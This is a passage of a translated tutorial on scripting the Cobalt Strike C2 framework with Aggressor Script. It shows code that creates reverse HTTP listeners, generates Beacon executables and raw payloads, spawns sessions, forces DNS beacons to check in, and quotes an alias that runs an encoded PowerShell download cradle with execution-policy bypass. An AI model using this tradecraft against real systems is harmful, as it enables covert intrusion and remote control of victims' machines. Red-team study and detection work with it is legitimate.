    <span class="token function">println</span><span class="token punctuation">(</span><span class="token string">&quot;IP地址：&quot;</span><span class="token punctuation">.</span><span class="token function">targets</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span>$<span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">&quot;address&quot;</span><span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token string">&quot;\n操作系统：&quot;</span><span class="token punctuation">.</span><span class="token function">targets</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span>$<span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">&quot;os&quot;</span><span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token string">&quot;\n用户名：&quot;</span><span class="token punctuation">.</span><span class="token function">targets</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span>$<span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">&quot;name&quot;</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
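
# Added example (not code from the original page): the same lookup, but it
# validates the index before using it and lists every host when no index is
# given. The command name "hosts" is an assumption chosen for this example.
command hosts {
	local('@hosts $i $h');
	@hosts = targets();
	if ($1 eq &quot;&quot;) {
		# no index given: list every host the team server knows about
		foreach $i =&gt; $h (@hosts) {
			println(&quot;[$i] &quot; . $h['address'] . &quot;  &quot; . $h['name'] . &quot;  &quot; . $h['os']);
		}
	}
	else if (-isnumber $1 &amp;&amp; $1 &gt;= 0 &amp;&amp; $1 &lt; size(@hosts)) {
		$h = @hosts[$1];
		println(&quot;IP: &quot; . $h['address'] . &quot;\nOS: &quot; . $h['os'] . &quot;\nHost: &quot; . $h['name']);
	}
	else {
		# an out-of-range or non-numeric index would otherwise raise an error
		println(&quot;No host with index $1 (the team server knows &quot; . size(@hosts) . &quot;)&quot;);
	}
}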
</code></pre> </div><p>Run it and check the result:</p> <p><img src="/images/Aggressor-Script/image-20201213193121595.png" alt="image-20201213193121595"></p> <p>The 0 and 1 we typed are the subscripts being read.</p> <p>Of course we can also modify the data model's output.</p> <h1 id="listeners">Listeners <a href="#listeners" class="header-anchor">#</a></h1> <blockquote><p>Used to show the existing listeners</p></blockquote> <p>A listener is something we use all the time: it receives the C2 implant's traffic, and its settings are written into the payload. When a payload is generated, the information of the listener we selected is written into it, and in the second stage the Stager loads that configuration. For a Beacon HTTP listener, what gets written includes the IP, port, callback address and so on, as shown:</p> <p><img src="/images/Aggressor-Script/image-20201213202406153.png" alt="image-20201213202406153"></p> <p>The Listener API exposes all listener information. We can use <code>listeners()</code> to show all of it; if we have local listeners, for example an SMB listener, we need <code>listeners_local()</code> to show the local ones, as follows:</p> <p><img src="/images/Aggressor-Script/image-20201213210924614.png" alt="image-20201213210924614"></p> <p>That shows the names, but not the details of each listener; for those we can use the listener_info function to show everything about a listener.</p> <ul><li><p>How to use listener_info:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>listener_info<span class="token punctuation">(</span><span class="token string">&quot;name of the listener to inspect&quot;</span><span class="token punctuation">)</span>
</code></pre> </div><p><img src="/images/Aggressor-Script/image-20201213213825612.png" alt="image-20201213213825612"></p> <p>We can combine the two to show every listener's details, passing each name from listeners() to listener_info:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">command</span> show_info <span class="token punctuation">{</span>
	foreach <span class="token variable">$name</span> <span class="token punctuation">(</span>listeners<span class="token punctuation">(</span><span class="token punctuation">))</span> <span class="token punctuation">{</span>
		println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\n">\n</span>== <span class="token variable">$name</span> 的配置信息 == &quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		foreach <span class="token variable">$key</span> <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token variable">$value</span> <span class="token punctuation">(</span>listener_info<span class="token punctuation">(</span><span class="token variable">$name</span><span class="token punctuation">))</span> <span class="token punctuation">{</span>
			println<span class="token punctuation">(</span><span class="token string">&quot;$[10]key : <span class="token variable">$value</span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">}</span>
	<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</code></pre> </div><p><img src="/images/Aggressor-Script/image-20201213220411582.png" alt="image-20201213220411582"></p> <p>After loading the cna above we get output like this.</p></li> <li><p>listener_create_ext creates a new listener</p> <p>We can create one directly in the GUI; in fact the GUI also calls listener_create_ext to create it. Its parameters are defined as follows:</p> <p><code>$1</code> - listener name
<code>$2</code> - payload (for example windows/beacon_http/reverse_http)
<code>$3</code> - a map of key/value pairs specifying the listener's connection settings, such as host and port</p> <p>Options for <code>$2</code>:</p> <table><thead><tr><th>payload</th> <th>Type</th></tr></thead> <tbody><tr><td>windows/beacon_dns/reverse_dns_txt</td> <td>Beacon DNS</td></tr> <tr><td>windows/beacon_http/reverse_http</td> <td>Beacon HTTP</td></tr> <tr><td>windows/beacon_https/reverse_https</td> <td>Beacon HTTPS</td></tr> <tr><td>windows/beacon_bind_pipe</td> <td>Beacon SMB</td></tr> <tr><td>windows/beacon_bind_tcp</td> <td>Beacon TCP</td></tr> <tr><td>windows/beacon_extc2</td> <td>External C2</td></tr> <tr><td>windows/foreign/reverse_http</td> <td>Foreign HTTP</td></tr> <tr><td>windows/foreign/reverse_https</td> <td>Foreign HTTPS</td></tr></tbody></table> <p>Options for <code>$3</code>:</p> <table><thead><tr><th>Key</th> <th>DNS</th> <th>HTTP/S</th> <th>SMB</th> <th>TCP(Bind)</th></tr></thead> <tbody><tr><td>althost</td> <td></td> <td>HTTP Host header</td> <td></td> <td></td></tr> <tr><td>bindto</td> <td>bind port</td> <td>bind port</td> <td></td> <td></td></tr> <tr><td>beacons</td> <td>C2 hosts</td> <td>C2 hosts</td> <td></td> <td></td></tr> <tr><td>host</td> <td>staging host</td> <td>staging host</td> <td></td> <td></td></tr> <tr><td>port</td> <td>C2 port</td> <td>C2 port</td> <td>pipe name</td> <td>port</td></tr> <tr><td>profile</td> <td></td> <td>profile variant</td> <td></td> <td></td></tr> <tr><td>proxy</td> <td></td> <td>proxy config</td> <td></td> <td></td></tr></tbody></table> <p>Following this, we use a cna to configure a Beacon HTTP listener:</p> <p>Syntax:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>listener_create_ext<span class="token punctuation">(</span><span class="token string">&quot;listener name&quot;</span>,<span class="token string">&quot;chosen payload&quot;</span>,%<span class="token punctuation">(</span><span class="token string">&quot;parameters required by the chosen payload&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>实践</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>listener_create_ext<span class="token punctuation">(</span><span class="token string">&quot;我的HTTP监听&quot;</span>,<span class="token string">&quot;windows/beacon_http/reverse_http&quot;</span>,%<span class="token punctuation">(</span>host<span class="token operator">=</span><span class="token operator">&gt;</span><span class="token string">&quot;IP或者域名&quot;</span>,port<span class="token operator">=</span><span class="token operator">&gt;</span><span class="token number">1080</span>,beacons <span class="token operator">=</span><span class="token operator">&gt;</span><span class="token string">&quot;IP或者域名&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
printAll<span class="token punctuation">(</span>listeners<span class="token punctuation">(</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;创建成功！&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre></div><p>Because my port was already in use, I delete the existing listener first:</p> <p><img src="/images/Aggressor-Script/image-20201213222945393.png" alt="image-20201213222945393"></p> <p>Then run the cna script and check:</p> <p><img src="/images/Aggressor-Script/image-20201213223523971.png" alt="image-20201213223523971"> <img src="/images/Aggressor-Script/image-20201213223612288.png" alt="image-20201213223612288">
Created successfully. We did not fill in every parameter here, exactly as when creating a listener in the GUI. The original article also mentions a proxy problem; I did not cover it here because I feel it is rarely used.</p></li> <li><p>Session passing</p> <p>In daily use we pass sessions (Spawn), for example passing a session to MSF, or passing an SMB session to another session. Below is the source of this operation:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>item <span class="token string">&quot;&amp;Spawn&quot;</span> <span class="token punctuation">{</span>
	openPayloadHelper<span class="token punctuation">(</span>lambda<span class="token punctuation">(</span><span class="token punctuation">{</span>
		binput<span class="token punctuation">(</span><span class="token variable">$bids</span>, <span class="token string">&quot;spawn x86 <span class="token variable">$1</span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		bspawn<span class="token punctuation">(</span><span class="token variable">$bids</span>, <span class="token variable">$1</span>, <span class="token string">&quot;x86&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">}</span>, <span class="token variable">$bids</span> <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token variable">$1</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre></div><p>This involves several functions (the author calls them "data models"); we go through them one by one.</p> <ul><li><p>openPayloadHelper: opens the dialog listing the listeners we have</p></li> <li><p>bspawn: creates a new session; it needs a session ID passed in</p></li></ul></li></ul> <div class="language-java line-numbers-mode"><pre class="language-java"><code>    popup beacon_bottom<span class="token punctuation">{</span>
    	<span class="token function">item</span><span class="token punctuation">(</span><span class="token string">&quot;&amp;会话传递&quot;</span><span class="token punctuation">,</span><span class="token punctuation">{</span><span class="token function">openPayloadHelper</span><span class="token punctuation">(</span><span class="token function">lambda</span><span class="token punctuation">(</span><span class="token punctuation">{</span>
    	<span class="token function">bspawn</span><span class="token punctuation">(</span>$bid<span class="token punctuation">,</span> $<span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  	<span class="token function">println</span><span class="token punctuation">(</span><span class="token string">&quot;我们传递的监听器是&quot;</span><span class="token punctuation">.</span>$<span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">}</span><span class="token punctuation">,</span># 
        $bid <span class="token operator">=</span><span class="token operator">&gt;</span> $<span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">}</span>
</code></pre></div><p>When openPayloadHelper opens the dialog of existing listeners it has to receive a value: the selected listener. That value is then passed to bspawn, whose first argument is also the selected listener (bspawn spawns a new session), so handing the chosen listener to bspawn is what passes the session. This pattern is fixed: openPayloadHelper cannot be used on its own, but bspawn can. After running the code above we can inspect the value of <code>$1</code>, and you will find it is exactly the listener we selected:</p> <p><img src="/images/Aggressor-Script/image-20201214112030750.png" alt="image-20201214112030750"> <img src="/images/Aggressor-Script/image-20201214112048256.png" alt="image-20201214112048256"></p> <p><img src="/images/Aggressor-Script/image-20201214112103471.png" alt="image-20201214112103471"></p> <p>With this we have effectively rewritten the Spawn function ourselves.</p> <p>The official menu code uses <code>binput</code>, a function that displays the command we executed in the Beacon console; below is the result of the official version:
<img src="/images/Aggressor-Script/image-20201214112330479.png" alt="image-20201214112330479"></p> <h2 id="stagers">Stagers <a href="#stagers" class="header-anchor">#</a></h2> <blockquote><p>I can only describe the stager from my own understanding; it will surely differ from many others', so treat this as a reference only</p></blockquote> <p>"Stage" refers to staging; the word itself carries no special meaning, it just names this type. A staged payload is generally used when we cannot use a large file or command on the target: the code is downloaded from the remote end stage by stage and delivered to the controlled host.</p> <p>"Stager" refers to the loader, as in the screenshot below:</p> <p><img src="/images/Aggressor-Script/image-20201214141457999.png" alt="image-20201214141457999"></p> <p>Here the stager requests the URL I configured, so we can think of the stager as a loader that loads remote code. The official documentation explains it like this: a stager is a tiny program that downloads the payload and passes execution to it; it suits attacks with size constraints, such as user-driven attacks.</p> <p>We can use the stager function to print this information; it takes two arguments:</p> <p><code>$1</code> the listener name</p> <p><code>$2</code> the architecture, x86 | x64</p> <p>We can check it in the console:
<img src="/images/Aggressor-Script/image-20201214142943361.png" alt="image-20201214142943361"></p> <p>Next, the artifact_stager function generates an executable or another kind of artifact; it takes three arguments:
<code>$1</code> the listener name</p> <p><code>$2</code> the type of file to generate, e.g. exe</p> <p><code>$3</code> the architecture, x86 | x64</p> <p>The options for <code>$2</code> are:</p> <table><thead><tr><th>Type</th> <th>Description</th></tr></thead> <tbody><tr><td>dll</td> <td>a DLL</td></tr> <tr><td>exe</td> <td>an executable EXE</td></tr> <tr><td>powershell</td> <td>a PowerShell script</td></tr> <tr><td>python</td> <td>a Python script</td></tr> <tr><td>raw</td> <td>raw file</td></tr> <tr><td>svcexe</td> <td>a service EXE (svc.exe)</td></tr> <tr><td>vbscript</td> <td>a VBS file</td></tr></tbody></table> <p>We generate with artifact_stager:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token variable">$data</span> <span class="token operator">=</span> artifact_stager<span class="token punctuation">(</span><span class="token string">&quot;Tencent&quot;</span>, <span class="token string">&quot;exe&quot;</span>, <span class="token string">&quot;x64&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># listener, artifact type, architecture</span>

<span class="token variable">$handle</span> <span class="token operator">=</span> openf<span class="token punctuation">(</span><span class="token string">&quot;&gt;Kris.exe&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># output path; here it is the directory the script is run from</span>
writeb<span class="token punctuation">(</span><span class="token variable">$handle</span>, <span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># write the bytes</span>
closef<span class="token punctuation">(</span><span class="token variable">$handle</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># close the handle; without this the script hangs</span>
</code></pre></div><p>We run it:</p> <p><img src="/images/Aggressor-Script/image-20201214145716511.png" alt="image-20201214145716511"></p> <p>Then run the generated artifact and see whether it checks in:</p> <p><img src="/images/Aggressor-Script/image-20201214145811630.png" alt="image-20201214145811630"></p> <p>It checks in; the GUI creates artifacts with this same function.</p> <h2 id="local-stagers">Local Stagers <a href="#local-stagers" class="header-anchor">#</a></h2> <blockquote><p>Local stager information</p></blockquote> <p>We mentioned above that listeners come in two kinds, local listeners and remote listeners. For a local bind TCP listener we can use the stager_bind_tcp function to view the stager; this function only handles TCP stagers and takes three arguments:</p> <p><code>$1</code> the name of the TCP listener we created</p> <p><code>$2</code> the listener's architecture</p> <p><code>$3</code> the listener's connection port</p> <p>We use the following code to view our TCP stager information:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token variable">$TcpStager</span> <span class="token operator">=</span> stager_bind_tcp<span class="token punctuation">(</span><span class="token string">&quot;你的TCP监听器名称&quot;</span>,<span class="token string">&quot;位数&quot;</span>,<span class="token string">&quot;bind to 端口&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
elog<span class="token punctuation">(</span><span class="token variable">$TcpStager</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201215142818777.png" alt="image-20201215142818777"></p> <p><img src="/images/Aggressor-Script/image-20201215142751398.png" alt="image-20201215142751398"></p> <p>In practice, adding the port made no difference:</p> <p><img src="/images/Aggressor-Script/image-20201215142952923.png" alt="image-20201215142952923"></p> <h2 id="named-pipe-stager">Named Pipe Stager <a href="#named-pipe-stager" class="header-anchor">#</a></h2> <p>A pipe stager is a loader used in internal network penetration for hosts that cannot reach the internet; it is only available for x86. We can use the stager_bind_pipe function to export the stager for an SMB listener; it takes the following argument:</p> <p><code>$1</code> the listener name</p> <p>That is the only argument it needs; since CS 4.0, creating an SMB listener only requires the listener name and everything else is filled in automatically.</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token variable">$SMB_stager</span> <span class="token operator">=</span> stager_bind_pipe<span class="token punctuation">(</span><span class="token string">&quot;SMB&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
elog<span class="token punctuation">(</span><span class="token variable">$SMB_stager</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201215143849447.png" alt="image-20201215143849447"></p> <h2 id="stageless-payloads">Stageless Payloads <a href="#stageless-payloads" class="header-anchor">#</a></h2> <p>Stageless is the opposite of staged: there are no stages. Stageless payloads are payloads with no staging step, and we can export them with the payload function:</p> <p><code>$1</code> the listener name</p> <p><code>$2</code> the architecture, x86 | x64</p> <p><code>$3</code> the process name</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token variable">$data</span> <span class="token operator">=</span> payload<span class="token punctuation">(</span><span class="token string">&quot;Tencent&quot;</span>, <span class="token string">&quot;x64&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$handle</span> <span class="token operator">=</span> openf<span class="token punctuation">(</span><span class="token string">&quot;&gt;out.bin&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
writeb<span class="token punctuation">(</span><span class="token variable">$handle</span>, <span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
closef<span class="token punctuation">(</span><span class="token variable">$handle</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201215151750713.png" alt="image-20201215151750713"></p> <p>Saved successfully; we can open it in a hex editor to look at the contents:</p> <p><img src="/images/Aggressor-Script/image-20201215151825407.png" alt="image-20201215151825407"></p> <h1 id="beacon">Beacon <a href="#beacon" class="header-anchor">#</a></h1> <blockquote><p>Beacon: "it is the agent of the C2 after asynchronous development" (machine translation...); my own understanding is that it refers to a host that has checked in</p></blockquote> <h2 id="元数据">Metadata <a href="#元数据" class="header-anchor">#</a></h2> <p>Once a (host) Beacon checks in, the C2 assigns it a unique session ID, which is a random number. Cobalt Strike associates tasks and metadata with each Beacon's ID. We can use the beacon_ids function to get the IDs of all current sessions:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>x beacon_ids<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token comment"># get all session IDs</span>
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201215153615139.png" alt="image-20201215153615139"></p> <p>With the session ID we obtained, we can use the beacon_info function to get all of its data; it returns a structure holding every field:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>x beacon_info<span class="token punctuation">(</span>beacon_ids<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token comment"># get all information for this session</span>
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201215153945572.png" alt="image-20201215153945572"></p> <p>We can use dictionary-style access:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>x beacon_info<span class="token punctuation">(</span>beacon_ids<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">&quot;os&quot;</span><span class="token punctuation">]</span> <span class="token comment"># get the os field</span>
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201215154130011.png" alt="image-20201215154130011"></p> <p>So we can loop through and print every field for each session ID:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">command</span> show_all <span class="token punctuation">{</span>
	foreach <span class="token variable">$entry</span> <span class="token punctuation">(</span>beacons<span class="token punctuation">(</span><span class="token punctuation">))</span> <span class="token punctuation">{</span> <span class="token comment"># loop over every Beacon record (each carries its session ID)</span>
		println<span class="token punctuation">(</span><span class="token string">&quot;== &quot;</span><span class="token builtin class-name">.</span><span class="token string">&quot;会话ID&quot;</span><span class="token builtin class-name">.</span><span class="token string">&quot;【&quot;</span><span class="token builtin class-name">.</span> <span class="token variable">$entry</span><span class="token punctuation">[</span><span class="token string">'id'</span><span class="token punctuation">]</span> <span class="token builtin class-name">.</span><span class="token string">&quot;】&quot;</span><span class="token builtin class-name">.</span><span class="token string">&quot;的信息如下&quot;</span><span class="token builtin class-name">.</span><span class="token string">&quot; ==&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		foreach <span class="token variable">$key</span> <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token variable">$value</span> <span class="token punctuation">(</span><span class="token variable">$entry</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token comment"># pull each key/value pair of this record in turn</span>
			println<span class="token punctuation">(</span><span class="token string">&quot;$[15]key : <span class="token variable">$value</span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">}</span>
		println<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201215154601528.png" alt="image-20201215154601528"></p> <p>Besides this, the beacons function returns all of the information at once:</p> <p><img src="/images/Aggressor-Script/image-20201215154750767.png" alt="image-20201215154750767"></p> <h2 id="alias">Alias <a href="#alias" class="header-anchor">#</a></h2> <p>We can use alias to add new Beacon commands; as elsewhere in Aggressor Script, we can define our own functions or code.</p> <p>It has three kinds of arguments:</p> <p><code>$0</code> the alias name we chose together with the arguments passed to it</p> <p><code>$1</code> the ID of the current session</p> <p><code>$2-3-4....</code> the second argument onward are the arguments we passed, separated by spaces. An example:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">alias</span> info <span class="token punctuation">{</span>
	blog<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;我的名字是 <span class="token variable">$2</span> ，今年 <span class="token variable">$3</span> 岁了，住在 <span class="token variable">$4</span> &quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201215173708003.png" alt="image-20201215173708003"></p> <p><strong>Pay close attention to the format! There must be spaces on both sides of a variable, otherwise it will not run, as below:</strong></p> <p><img src="/images/Aggressor-Script/image-20201215173830729.png" alt="image-20201215173830729"></p> <h2 id="reacting-to-new-beacons">Reacting to new Beacons <a href="#reacting-to-new-beacons" class="header-anchor">#</a></h2> <p>We can use the beacon_initial event to act when a host checks in. Here we configure it so that when a host checks in we read its information and pop up a window to tell us. When beacon_initial fires it passes a single value, the session ID, and only that; we use the session ID to read the information:</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>on beacon_initial {
	show_message(&quot;你有新的主机上线！\n会话ID为：$1 \nOS为：&quot;.beacon_info($1,&quot;os&quot;).&quot;\n内网地址为:&quot;.beacon_info($1,&quot;internal&quot;)); 
}
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201215175511736.png" alt="image-20201215175511736"></p> <h2 id="reacting-to-new-dns-beacons">Reacting to new DNS Beacons <a href="#reacting-to-new-dns-beacons" class="header-anchor">#</a></h2> <p>But the approach above does not suit DNS check-ins, because when a DNS host checks in no data is exchanged; we have to switch the data channel ourselves. Let's try the code above:</p> <p><img src="/images/Aggressor-Script/2.gif" alt="2"></p> <p>Our handler was not triggered. Now see the result after we change its communication mode:</p> <p><img src="/images/Aggressor-Script/image-20201215194614464.png" alt="image-20201215194614464"></p> <p>After switching we get a response. To solve this, we can use the beacon_initial_empty event to run commands when a DNS Beacon is received.</p> <p>Like beacon_initial, its first argument is the session ID of the new Beacon. We write the code below so that when a DNS Beacon calls back we automatically switch its communication mode:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>on beacon_initial_empty <span class="token punctuation">{</span>
	bmode<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;dns-txt&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	bcheckin<span class="token punctuation">(</span><span class="token variable">$1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

on beacon_initial <span class="token punctuation">{</span>
	show_message<span class="token punctuation">(</span><span class="token string">&quot;你有新的主机上线！<span class="token entity" title="\n">\n</span>会话ID为：<span class="token variable">$1</span> <span class="token entity" title="\n">\n</span>OS为：&quot;</span>.beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;os&quot;</span><span class="token punctuation">)</span>.<span class="token string">&quot;<span class="token entity" title="\n">\n</span>内网地址为:&quot;</span>.beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;internal&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span> 
<span class="token punctuation">}</span>
</code></pre></div><ul><li><p>bmode takes two arguments and switches the data channel:
<code>$1</code> the DNS Beacon's session ID</p> <p><code>$2</code> the DNS Beacon's new communication mode (for example dns, dns6 or dns-txt)</p></li> <li><p>bcheckin takes one argument and forces a check-in:
<code>$1</code> the Beacon's session ID</p></li></ul> <p>The code above works like this: when our DNS Beacon calls back, switch the DNS Beacon's data mode, force a check-in, and then print our message. The result:</p> <p><img src="/images/Aggressor-Script/3.gif" alt="3"></p> <p>That solves the problem.</p> <h2 id="beacon-bottom-beacon-top">beacon_bottom &amp;&amp; beacon_top <a href="#beacon-bottom-beacon-top" class="header-anchor">#</a></h2> <p>To add our own entry to a Beacon's right-click menu, just as in the very first example, the beacon_bottom hook creates a right-click entry that is appended as the last row. To show it at the top instead, use the beacon_top hook to place it first:</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>popup beacon_bottom{
	item(&quot;&amp;在最下方&quot;,{});
}

popup beacon_top{
	item(&quot;在最下方&quot;,{});
}
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201215204731123.png" alt="image-20201215204731123"></p> <h2 id="the-logging-contract">The Logging Contract <a href="#the-logging-contract" class="header-anchor">#</a></h2> <p>Cobalt Strike (C2) 3.0 and above keeps very detailed records of user input: every command executed against a Beacon is logged with a timestamp and the user name. The Beacon console in the Cobalt Strike client handles this logging, and it is done through the binput function, which takes two arguments:</p> <p><code>$1</code> the Beacon's session ID</p> <p><code>$2</code> the message to display in the Beacon console</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>binput<span class="token punctuation">(</span>beacon_ids<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>,<span class="token string">&quot;在beacon中显示的信息&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201215211647740.png" alt="image-20201215211647740"></p> <p>Here we output text directly; we can also turn it into a command:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>binput<span class="token punctuation">(</span>beacon_ids<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>,bshell<span class="token punctuation">(</span>beacon_ids<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>,<span class="token string">&quot;whoami&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201215213105909.png" alt="image-20201215213105909"></p> <h2 id="conquering-the-shell">Conquering the Shell <a href="#conquering-the-shell" class="header-anchor">#</a></h2> <blockquote><p>Here the official documentation explains where Beacon's powershell command comes from. I will not translate it, but I paste the official documentation below</p></blockquote> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token comment"># source of the powershell alias</span>

<span class="token builtin class-name">alias</span> powershell <span class="token punctuation">{</span>
	local<span class="token punctuation">(</span><span class="token string">'<span class="token variable">$args</span> <span class="token variable">$cradle</span> <span class="token variable">$runme</span> <span class="token variable">$cmd</span>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># $0 is the entire command with no parsing.</span>
	<span class="token variable">$args</span>   <span class="token operator">=</span> substr<span class="token punctuation">(</span><span class="token variable">$0</span>, <span class="token number">11</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># generate the download cradle (if one exists) for an imported PowerShell script</span>
	<span class="token variable">$cradle</span> <span class="token operator">=</span> beacon_host_imported_script<span class="token punctuation">(</span><span class="token variable">$1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># encode our download cradle AND cmdlet+args we want to run</span>
	<span class="token variable">$runme</span>  <span class="token operator">=</span> base64_encode<span class="token punctuation">(</span> str_encode<span class="token punctuation">(</span><span class="token variable">$cradle</span> <span class="token builtin class-name">.</span> <span class="token variable">$args</span>, <span class="token string">&quot;UTF-16LE&quot;</span><span class="token punctuation">)</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># Build up our entire command line.</span>
	<span class="token variable">$cmd</span>    <span class="token operator">=</span> <span class="token string">&quot; -nop -exec bypass -EncodedCommand <span class="token entity" title="\&quot;">\&quot;</span> $+ <span class="token variable">$runme</span> $+ <span class="token entity" title="\&quot;">\&quot;</span>&quot;</span><span class="token punctuation">;</span>
	
	<span class="token comment"># task Beacon to run all of this.</span>
	btask<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;Tasked beacon to run: <span class="token variable">$args</span>&quot;</span>, <span class="token string">&quot;T1086&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	beacon_execute_job<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;powershell&quot;</span>, <span class="token variable">$cmd</span>, <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
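
# ---------------------------------------------------------------
# Added example (an editor's addition, not part of the official alias
# above): reverse the encoding the alias performs, so that a value found
# in a process-creation log's -EncodedCommand argument can be read by an
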